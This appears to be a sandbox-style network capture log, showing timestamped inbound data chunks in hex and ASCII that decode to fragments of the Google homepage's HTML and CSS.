.gb_pd{padding-top:32px}.gb_Bd{color:#ffffff;font-size:13px;font-weight:bold
2021-09-14 14:03:24 UTC	83	IN	Data Raw: 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 29 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73 Data Ascii: r-gradient(top,rgba(0,0,0,0.14),rgba(0,0,0,0.2));background-image:-ms-linear-gradient(top,rgba(0,0,0,0.14),rgba(0,0,0,0.2));border:1px solid rgba(0,0,0,0.2);box-shadow:0 1px 1px rgba(0,0,0,0.1);filter:progid:DXImageTransform.Microsoft.gradient(startColors
2021-09-14 14:03:24 UTC	85	IN	Data Raw: 34 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 30 70 78 7d 2e 71 61 72 73 74 62 7b 66 6c 65 78 2d 67 72 6f 77 3a 31 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4c 33 65 55 67 62 22 20 64 61 74 61 2d 68 76 65 69 64 3d 22 31 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 6e 31 78 4a 63 66 20 4e 65 36 6e 53 64 22 3e 3c 73 74 79 6c 65 3e 2e 4e 65 36 6e 53 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 36 70 78 7d 61 2e 4d 56 33 54 6e 62 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 35 70 78 3b 6d 61 72 67 69 6e 3a 30 20 35 70 78 3b 63 6f 6c 6f 72 3a 23 32 32 32 7d 61 2e 4d 56 33 54 6e 62 3a 66 69 72 73 74 Data Ascii: 4e{max-height:160px}.qarstb{flex-grow:1}</style><div class="L3eUgb" data-hveid="1"><div class="o3j99 n1xJcf Ne6nSd"><style>.Ne6nSd{display:flex;align-items:center;padding:6px}a.MV3Tnb{display:inline-block;padding:5px;margin:0 5px;color:#222}a.MV3Tnb:first
2021-09-14 14:03:24 UTC	86	IN	Data Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 53 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 4e 63 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 42 20 67 62 5f 62 64 20 67 62 5f 68 20 67 62 5f 41 66 22 20 64 61 74 61 2d 6f 67 73 72 2d 66 62 3d 22 74 72 75 65 22 20 64 61 74 61 2d 6f 67 73 72 2d 61 6c 74 3d 22 22 20 69 64 3d 22 67 62 77 61 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 5f 7a 66 22 3e 3c 61 20 63 6c 61 73 73 3d 22 67 62 5f 43 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 6f 6f 67 6c 65 20 61 70 70 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 22 20 61 72 69 61 2d 65 78 70 61 6e Data Ascii: div></div><div class="gb_Se"><div class="gb_Nc"><div class="gb_B gb_bd gb_h gb_Af" data-ogsr-fb="true" data-ogsr-alt="" id="gbwa"><div class="gb_zf"><a class="gb_C" aria-label="Google apps" href="https://www.google.co.uk/intl/en/about/products" aria-expan
2021-09-14 14:03:24 UTC	87	IN	Data Raw: 75 74 6f 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6b 31 7a 49 41 20 72 53 6b 34 73 65 22 3e 3c 73 74 79 6c 65 3e 2e 72 53 6b 34 73 65 7b 6d 61 78 2d 68 65 69 67 68 74 3a 39 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 6e 58 64 70 64 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 6e 74 61 69 6e 3b 6f 62 6a 65 63 74 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 3b 77 69 64 74 68 3a 61 75 74 6f 7d 3c 2f 73 74 79 6c 65 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 6c 6e 58 64 70 64 22 20 61 6c 74 3d 22 47 6f 6f 67 6c 65 22 20 68 65 69 67 68 74 3d 22 39 32 22 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 Data Ascii: uto}</style><div class="k1zIA rSk4se"><style>.rSk4se{max-height:92px;position:relative}.lnXdpd{max-height:100%;max-width:100%;object-fit:contain;object-position:center bottom;width:auto}</style><img class="lnXdpd" alt="Google" height="92" src="/images/bra
2021-09-14 14:03:24 UTC	89	IN	Data Raw: 6d 63 61 76 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 65 6d 63 61 76 2e 65 6d 63 61 74 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 32 34 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 32 34 70 78 7d 2e 6d 69 6e 69 64 69 76 20 2e 65 6d 63 61 76 2e 65 6d 63 61 74 20 2e 52 4e 4e 58 67 62 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 31 36 70 78 7d 2e 52 4e 4e 58 67 62 3a Data Ascii: mcav .RNNXgb{border-bottom-left-radius:0;border-bottom-right-radius:0}.emcav.emcat .RNNXgb{border-bottom-left-radius:24px;border-bottom-right-radius:24px}.minidiv .emcav.emcat .RNNXgb{border-bottom-left-radius:16px;border-bottom-right-radius:16px}.RNNXgb:
2021-09-14 14:03:24 UTC	90	IN	Data Raw: 73 74 79 6c 65 3e 2e 67 4c 46 79 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 37 29 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 30 30 25 3b 2d 6d 73 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 33 37 70 78 3b 68 65 69 67 68 74 3a 33 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 2e 6d 69 6e 69 64 69 76 20 2e 67 4c 46 79 66 7b 6d 61 72 67 69 6e Data Ascii: style>.gLFyf{background-color:transparent;border:none;margin:0;padding:0;color:rgba(0,0,0,.87);word-wrap:break-word;outline:none;display:flex;flex:100%;-ms-tap-highlight-color:transparent;margin-top:-37px;height:34px;font-size:16px;}.minidiv .gLFyf{margin
2021-09-14 14:03:24 UTC	91	IN	Data Raw: 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 6f 72 64 65 72 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 20 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 34 70 78 7d 2e 4d 32 76 56 33 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 45 78 43 4b 6b 66 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 37 30 37 35 37 61 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 6d 69 6e 69 64 69 76 20 2e 42 4b 52 50 65 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 6d 69 6e 69 64 69 76 20 2e 45 78 43 4b 6b 66 7b 77 69 64 74 68 3a 32 30 70 78 7d 3c 2f 73 74 79 6c 65 Data Ascii: r;align-items:center;border:0;background:transparent;outline:none;padding:0 8px;line-height:44px}.M2vV3{display:flex}.ExCKkf{height:100%;color:#70757a;vertical-align:middle;outline:none}.minidiv .BKRPef{line-height:32px}.minidiv .ExCKkf{width:20px}</style
2021-09-14 14:03:24 UTC	92	IN	Data Raw: 31 36 70 78 7d 2e 65 72 6b 76 51 65 7b 66 6c 65 78 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 7d 2e 52 6a 50 75 56 62 7b 68 65 69 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 30 20 32 36 70 78 20 30 20 30 7d 2e 53 33 6e 46 6e 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 53 33 6e 46 6e 64 20 2e 52 6a 50 75 56 62 2c 2e 53 33 6e 46 6e 64 20 2e 61 61 6a 5a 43 62 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 7d 2e 6c 68 38 37 6b 65 3a 6c 69 6e 6b 2c 2e 6c 68 38 37 6b 65 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 31 61 30 64 61 62 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 66 6f 6e 74 3a 31 31 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f Data Ascii: 16px}.erkvQe{flex:auto;padding-bottom:8px;}.RjPuVb{height:1px;margin:0 26px 0 0}.S3nFnd{display:flex}.S3nFnd .RjPuVb,.S3nFnd .aajZCb{flex:0 0 auto}.lh87ke:link,.lh87ke:visited{color:#1a0dab;cursor:pointer;font:11px arial,sans-serif;padding:0 5px;margin-to
2021-09-14 14:03:24 UTC	94	IN	Data Raw: 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 20 30 20 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 30 20 38 70 78 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 79 6e 52 72 69 63 22 20 69 64 3d 22 79 6e 52 72 69 63 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 3c 2f 6c 69 3e 3c 73 74 79 6c 65 3e 23 59 4d 58 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 73 62 63 74 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 Data Ascii: family:Google Sans,arial,sans-serif-medium,sans-serif;font-size:14px;margin:0 20px 0 16px;padding:8px 0 8px 0;line-height:16px;width:100%}</style><li class="ynRric" id="ynRric" role="presentation"></li><style>#YMXe{display:none}.sbct{display:flex;align-it
2021-09-14 14:03:24 UTC	95	IN	Data Raw: 67 2d 74 6f 70 3a 30 7d 2e 6d 75 73 5f 69 6c 5f 61 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 7d 2e 6d 75 73 5f 69 6c 5f 73 74 7b 72 69 67 68 74 3a 35 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6d 75 73 5f 69 6c 5f 69 7b 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 7d 2e 6d 75 73 5f 69 74 33 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 7d 2e 6d 75 73 5f 69 74 35 7b 68 65 69 67 68 74 3a 32 34 70 78 3b 77 69 64 74 68 3a 32 34 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 6f 74 74 6f 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 6d 61 72 67 Data Ascii: g-top:0}.mus_il_at{margin-left:10px}.mus_il_st{right:52px;position:absolute}.mus_il_i{align:left;margin-right:10px}.mus_it3{margin-bottom:3px;max-height:24px;vertical-align:bottom}.mus_it5{height:24px;width:24px;vertical-align:bottom;margin-left:10px;marg
2021-09-14 14:03:24 UTC	96	IN	Data Raw: 70 6f 69 6e 74 65 72 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 7d 2e 6c 4a 39 46 42 63 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 68 6f 76 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 63 65 30 3b 63 6f 6c 6f 72 3a 23 32 30 32 31 32 34 7d 2e 6c 4a 39 46 42 63 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 34 32 38 35 66 34 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 20 3c 63 65 6e 74 65 72 3e 20 3c 69 6e 70 Data Ascii: pointer;user-select:none}.lJ9FBc input[type="submit"]:hover{box-shadow:0 1px 1px rgba(0,0,0,.1);background-color:#f8f9fa;border:1px solid #dadce0;color:#202124}.lJ9FBc input[type="submit"]:focus{border:1px solid #4285f4;outline:none}</style> <center> <inp
2021-09-14 14:03:24 UTC	97	IN	Data Raw: 65 72 3d 22 45 6b 65 76 58 62 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 6a 73 61 63 74 69 6f 6e 3d 22 72 63 75 51 36 62 3a 6e 70 54 32 6d 64 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 64 75 66 33 2d 34 36 22 20 64 61 74 61 2d 6a 69 69 73 3d 22 75 70 22 20 64 61 74 61 2d 61 73 79 6e 63 2d 74 79 70 65 3d 22 64 75 66 66 79 33 22 20 64 61 74 61 2d 61 73 79 6e 63 2d 63 6f 6e 74 65 78 74 2d 72 65 71 75 69 72 65 64 3d 22 74 79 70 65 2c 6f 70 65 6e 2c 66 65 61 74 75 72 65 5f 69 64 2c 61 73 79 6e 63 5f 69 64 2c 65 6e 74 72 79 5f 70 6f 69 6e 74 2c 61 75 74 68 6f 72 69 74 79 2c 63 61 72 64 5f 69 64 2c 66 74 6f 65 2c 74 69 74 6c 65 2c 68 65 61 64 65 72 2c 73 75 67 67 65 73 74 69 6f 6e 73 2c 73 75 72 66 61 63 65 2c 73 75 67 67 65 73 Data Ascii: er="EkevXb" style="display:none" jsaction="rcuQ6b:npT2md"></div><div id="duf3-46" data-jiis="up" data-async-type="duffy3" data-async-context-required="type,open,feature_id,async_id,entry_point,authority,card_id,ftoe,title,header,suggestions,surface,sugges
2021-09-14 14:03:24 UTC	99	IN	Data Raw: 6d 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 71 61 72 73 74 62 22 3e 3c 73 74 79 6c 65 3e 2e 76 63 56 5a 37 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 33 6a 39 39 20 63 39 33 47 62 65 22 3e 3c 73 74 79 6c 65 3e 2e 63 39 33 47 62 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 32 66 32 66 32 7d 2e 75 55 37 64 4a 62 7b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 33 30 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 63 65 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 34 29 7d 2e 53 53 77 6a 49 65 7b 70 61 64 64 69 6e 67 3a 30 20 32 Data Ascii: m></div><div class="o3j99 qarstb"><style>.vcVZ7d{text-align:center}</style></div><div class="o3j99 c93Gbe"><style>.c93Gbe{background:#f2f2f2}.uU7dJb{padding:15px 30px;border-bottom:1px solid #dadce0;font-size:15px;color:rgba(0,0,0,.54)}.SSwjIe{padding:0 2
2021-09-14 14:03:24 UTC	100	IN	Data Raw: 4c 63 30 50 37 79 41 68 57 4e 33 4b 51 4b 48 52 6c 58 42 7a 73 51 6b 64 51 43 43 41 34 27 2c 27 27 2c 27 27 2c 65 76 65 6e 74 29 22 3e 41 64 76 65 72 74 69 73 69 6e 67 3c 2f 61 3e 3c 61 20 63 6c 61 73 73 3d 22 70 48 69 4f 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 3f 73 75 62 69 64 3d 77 77 2d 77 77 2d 65 74 2d 67 2d 61 77 61 2d 61 2d 67 5f 68 70 62 66 6f 6f 74 31 5f 31 21 6f 32 26 61 6d 70 3b 75 74 6d 5f 73 6f 75 72 63 65 3d 67 6f 6f 67 6c 65 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 67 6f 6f 67 6c 65 5f 68 70 62 66 6f 6f 74 65 72 26 61 6d 70 3b 66 67 3d 31 22 20 6f 6e 6d 6f 75 73 Data Ascii: Lc0P7yAhWN3KQKHRlXBzsQkdQCCA4','','',event)">Advertising</a><a class="pHiOh" href="https://www.google.com/services/?subid=ww-ww-et-g-awa-a-g_hpbfoot1_1!o2&utm_source=google.com&utm_medium=referral&utm_campaign=google_hpbfooter&fg=1" onmous
2021-09-14 14:03:24 UTC	101	IN	Data Raw: 73 70 61 6e 20 63 6c 61 73 73 3d 22 6b 74 4c 4b 69 22 3e 43 61 72 62 6f 6e 20 6e 65 75 74 72 61 6c 20 73 69 6e 63 65 20 32 30 30 37 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 78 77 50 47 63 20 69 54 6a 78 6b 66 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 48 69 4f 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 69 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 72 69 76 61 63 79 3f 68 6c 3d 65 6e 2d 47 42 26 61 6d 70 3b 66 67 3d 31 22 20 6f 6e 6d 6f 75 73 65 64 6f 77 6e 3d 22 72 65 74 75 72 6e 20 72 77 74 28 74 68 69 73 2c 27 27 2c 27 27 2c 27 27 2c 27 27 2c 27 41 4f 76 56 61 77 31 66 33 6f 2d 33 69 67 46 77 46 75 72 68 6e 6d 77 49 76 45 30 33 27 2c 27 27 2c 27 30 61 68 55 4b 45 77 69 4e 73 61 4c 63 Data Ascii: span class="ktLKi">Carbon neutral since 2007</span></a></div><div class="KxwPGc iTjxkf"><a class="pHiOh" href="https://policies.google.com/privacy?hl=en-GB&fg=1" onmousedown="return rwt(this,'','','','','AOvVaw1f3o-3igFwFurhnmwIvE03','','0ahUKEwiNsaLc
2021-09-14 14:03:24 UTC	103	IN	Data Raw: 70 6e 66 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 20 6a 73 61 63 74 69 6f 6e 3d 22 6b 65 79 64 6f 77 6e 3a 4f 45 58 43 33 63 3b 66 6f 63 75 73 6f 75 74 3a 59 34 38 70 56 62 22 3e 3c 6c 69 20 72 6f 6c 65 3d 22 6e 6f 6e 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 45 7a 56 52 71 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 65 6e 2d 47 42 26 61 6d 70 3b 66 67 3d 31 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 69 74 65 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 53 65 61 72 63 68 20 73 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 72 6f 6c 65 3d 22 6e 6f 6e 65 22 3e 3c 61 20 63 6c 61 73 73 3d 22 45 7a 56 52 71 22 20 68 72 65 66 3d 22 2f 61 64 76 61 6e 63 65 64 5f Data Ascii: pnf" role="menu" jsaction="keydown:OEXC3c;focusout:Y48pVb"><li role="none"><a class="EzVRq" href="https://www.google.com/preferences?hl=en-GB&fg=1" role="menuitem" tabindex="-1">Search settings</a></li><li role="none"><a class="EzVRq" href="/advanced_
2021-09-14 14:03:24 UTC	104	IN	Data Raw: 6f 70 3a 34 70 78 7d 2e 74 46 59 6a 5a 65 3a 68 6f 76 65 72 20 2e 69 4f 48 4e 4c 62 2c 2e 74 46 59 6a 5a 65 3a 66 6f 63 75 73 20 2e 69 4f 48 4e 4c 62 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 69 4f 48 4e 4c 62 7b 63 6f 6c 6f 72 3a 23 37 30 37 35 37 61 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 30 3b 77 69 64 74 68 3a 32 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 6a 73 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 66 58 4f 30 78 65 22 20 63 6c 61 73 73 3d 22 74 46 59 6a 5a 65 22 20 64 61 74 61 2d 62 73 64 6d 3d 22 30 22 20 64 61 74 61 2d 62 74 66 3d 22 30 22 20 64 61 74 61 2d 68 62 63 3d 22 23 31 61 37 33 65 38 22 20 64 61 74 61 2d 68 74 63 3d 22 23 66 66 66 22 20 64 61 74 61 2d 73 70 74 3d 22 31 Data Ascii: op:4px}.tFYjZe:hover .iOHNLb,.tFYjZe:focus .iOHNLb{opacity:1}.iOHNLb{color:#70757a;height:20px;margin-top:-2px;opacity:0;width:20px}</style><div jscontroller="fXO0xe" class="tFYjZe" data-bsdm="0" data-btf="0" data-hbc="#1a73e8" data-htc="#fff" data-spt="1
2021-09-14 14:03:24 UTC	105	IN	Data Raw: 30 2e 33 39 2c 30 2e 33 39 2c 31 2e 30 33 2c 30 2e 33 39 2c 31 2e 34 31 2c 30 63 30 2e 33 39 2d 30 2e 33 39 2c 30 2e 33 39 2d 31 2e 30 33 2c 30 2d 31 2e 34 31 4c 31 38 2e 33 36 2c 31 36 2e 39 35 7a 20 4d 31 39 2e 34 32 2c 35 2e 39 39 63 30 2e 33 39 2d 30 2e 33 39 2c 30 2e 33 39 2d 31 2e 30 33 2c 30 2d 31 2e 34 31 20 63 2d 30 2e 33 39 2d 30 2e 33 39 2d 31 2e 30 33 2d 30 2e 33 39 2d 31 2e 34 31 2c 30 6c 2d 31 2e 30 36 2c 31 2e 30 36 63 2d 30 2e 33 39 2c 30 2e 33 39 2d 30 2e 33 39 2c 31 2e 30 33 2c 30 2c 31 2e 34 31 73 31 2e 30 33 2c 30 2e 33 39 2c 31 2e 34 31 2c 30 4c 31 39 2e 34 32 2c 35 2e 39 39 7a 20 4d 37 2e 30 35 2c 31 38 2e 33 36 20 63 30 2e 33 39 2d 30 2e 33 39 2c 30 2e 33 39 2d 31 2e 30 33 2c 30 2d 31 2e 34 31 63 2d 30 2e 33 39 2d 30 2e 33 39 2d 31 Data Ascii: 0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41 c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36 c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1
2021-09-14 14:03:24 UTC	106	IN	Data Raw: 62 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 37 31 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 57 32 61 50 74 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 4b 78 76 6c 57 63 7b 77 69 64 74 68 3a 37 30 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 49 4b 6c 37 51 2e 68 6d 53 46 41 65 7b 77 69 64 74 68 3a 37 30 30 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 54 6a 74 48 65 22 20 69 64 3d 22 78 65 37 43 4f 65 22 20 74 69 74 6c 65 3d 22 42 65 66 6f 72 65 20 79 6f 75 20 63 6f 6e 74 69 6e 75 65 20 74 6f 20 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 22 20 61 Data Ascii: b{margin-top:71px;display:flex;flex-direction:column}.W2aPtb{display:block;margin:0 auto}.KxvlWc{width:700px;height:auto}.IKl7Q.hmSFAe{width:700px;box-sizing:border-box}</style><div class="HTjtHe" id="xe7COe" title="Before you continue to Google Search" a
